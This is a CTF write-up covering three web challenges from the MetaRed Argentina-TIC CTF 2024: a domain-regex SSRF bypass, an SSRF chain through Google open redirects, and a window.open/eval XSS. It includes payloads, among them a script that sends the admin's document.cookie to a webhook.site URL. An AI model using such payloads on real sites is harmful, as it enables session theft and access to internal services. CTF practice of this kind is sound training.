Try   HackMD

Description

My team, HCS (Heroes Cyber Security), as the cybersecurity community team from the Institut Teknologi Sepuluh Nopember (ITS), has participated in the MetaRed Argentina-TIC CTF 2024, which was hosted by CERTUNLP (CSIRT académico de la Universidad Nacional de La Plata).

We managed to secured 3rd place of 205 teams, thank you for my mentor @daffainfo who's had participate with me to solve the website challenge.

Siem logger

Exploit local first! You have the source code
https://siem.ctf.cert.unlp.edu.ar
Source : siem.zip

TL;DR

Bypass internal host, with redirection.

Solve

Got a website like this.

image

Since we got the source-code, we can analyze it.





























ALLOWED_DOMAIN = "intranet.ctf.cert.unlp.edu.ar"
domain_regex = re.compile(rf"^{re.escape(ALLOWED_DOMAIN)}")
flag = os.environ.get('FLAG', 'flag{fakeflag}')

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/send_flag', methods=['POST'])
def send_flag():
    target_domain = request.form.get('domain', '')

    if not domain_regex.match(target_domain):
        return jsonify({"error": "Invalid domain"}), 400
    try:
        siem_response = send_to_siem(target_domain)
        return jsonify({"success": "Flag sent successfully", "domain": target_domain, "siem_response": siem_response})
    except Exception as e:
        return jsonify({"error": f"Error sending flag: {e}"}), 500


def send_to_siem(domain):
    global flag
    data = {
        "domain": domain
    }                                                  # ↓ we are good people
    response = requests.post(f"https://{domain}/siem", verify=False, allow_redirects=False, json=data, headers={"Flag": flag})
    return "Log received"

See for the domain regex, which is can be bypassed like this intranet.ctf.cert.unlp.edu.ar.yourwebsite.com.
Because i don't have any host, we use alternative approach using @ according to this reference.

Make a request, then intercept it with Burpsuite.

image

Then we got flag on header.

image

flag{SsRF-Byp4SS-1s-FunnY!}

Open Googler

Went through Google. First try to exploit local! You have the source code attached.
https://googler.ctf.cert.unlp.edu.ar
Source : googler.zip

TL;DR

SSRF + Open Redirect on Google.

Solve

First of all we need check the source-code.




























try:
    session = requests.Session()
    session.max_redirects = 4
    response = session.get(url, timeout=4, allow_redirects=True)

    # Dont start in Google
    if "google.com" in urlparse(url).hostname:
        return render_template('result.html', error='Error 1: You cannot start in Google', url=url)

    # Dont end in Google
    if "google.com" in urlparse(response.url).hostname:
        return render_template('result.html', error='Error 2: You cannot finish at Google', url=url)

    # Check if went through Google
    through_google = False
    for i in response.history[1:]:
        if "google.com" == urlparse(i.url).hostname:
            through_google = True
            break
    
    if not through_google:
        return render_template('result.html', error='Error 3: You did not go through Google', url=url)

    return render_template('result.html', status_code=response.status_code, content=response.text, url=url)
        
except requests.exceptions.RequestException as e:
    return render_template('result.html', error=str(e), url=url)

We can do SSRF but there the requirement:

  1. Do not start with google domain
  2. Do not end with google domain
  3. Through goes google domain

It easily when you already have host domain, but for me little bit hard :joy: .

But for that i already have solution like this

http://googleads.g.doubleclick.net/pcs/click?adurl=https://google.com/url?q=http://localhost:8081/flag%26source=gmail%26ust=1731292172621000%26usg=AOvVaw2AXJAYB67T6oOikKsXYXkO

How do to that?
Well i just found similar challenge SURFING, then i got the googleads domain for the first part.

After that we use https://google.com/url?q= since we can modify the protocol after q parameter, because when i use google.com/amp/s/ it directly to https which is error because the flag was on http protocol.

The problem is, if we use that we need verify usg and ust from Google, for the solution we can use Gmail source like this reference.

All the payload is ready then just validate it.

image

flag{G00gl3_H4ck3r!!SsRf_4nd-0p3n_r3d1r3ct}

TokyoBento

You know, just hack the admin cookie. Exploit local first! Try in Google Chrome, Firefox is not vulnerable
https://tokyo.ctf.cert.unlp.edu.ar
Source : tokyo.zip

TL;DR

SSRF + window.open redirection

Solve

Got a website like this.

image

Then we try to analyze the website source-code.

<script>
    var urlParams = new URLSearchParams(window.location.search);        
    var query = urlParams.get('query').replace(/[^a-z]/g, '');    
    var param = urlParams.get('param') || "query";
    param = param.replace(/[^a-z]/g, '')
    document.querySelector('.searched').innerHTML = `${eval(param)}`;    
</script>

Since there a bot feature, i was concern this was XSS Vulnerable.
But those replace function it was not possible to do XSS (at least for me).
But those innerHTML of eval function is make me curious.

Then i checked the bot feature if we can do SSRF on other host, check with my webhook.

image

Well, we got the pingback, that's mean we can host our website with get cookie inside to obtain the flag.
Since i don't have any host, i just edit the landing page of my webhook with this script.

<script>
window.open("http://127.0.0.1:5000/?param=name&query=a", "<img src=x onerror=\"fetch('https://webhook.site/62d6da14-30db-435c-b673-fcbd599097a8/?x='+document.cookie)\">")
</script>

Validate on the bot, and we got the flag.

image

flag{GooGlECHr0me,Y0uAr3FuN}
Last changed by 
Abdi Pranata
Penetration Tester. Connect with me at LinkedIn https://www.linkedin.com/in/abdipranata/
0
526

Read more

All Website Challenge Write Up - Hack The System Bug Bounty CTF 2025

CTF Write-up for Bugcrowd College Rules CTF 2025I participated in this CTF competition with Heroes Cyber Security (HCS), the cybersecurity community team from Institut Teknologi Sepuluh Nopember (ITS).

Jun 30, 2025
Website Challenge Write Up - TSA Cyber Champion CTF 2024

CTF write up for TSA Cyber Champion CTF 2024. I took part in this CTF Competition with team "njir zeta wangy banget".

Mar 28, 2025
XSS Challenge - Keamanan Siber GEMASTIK 2024

Recently, we joined the GEMASTIK (Pagelaran Mahasiswa Nasional Bidang Teknologi Informasi dan Komunikasi) competition with the Cyber Security division.

Aug 9, 2024
All Website Challenge Write Up - Incognito 5.0 CTF 2024

Recently our team HCS (Heroes Cyber Security) as official Cybersecurity Community from Institut Teknologi Sepuluh Nopember has participated on Incognito 5.0 CTF 2024.

Apr 17, 2024
Read more from Abdi Pranata
Published on HackMD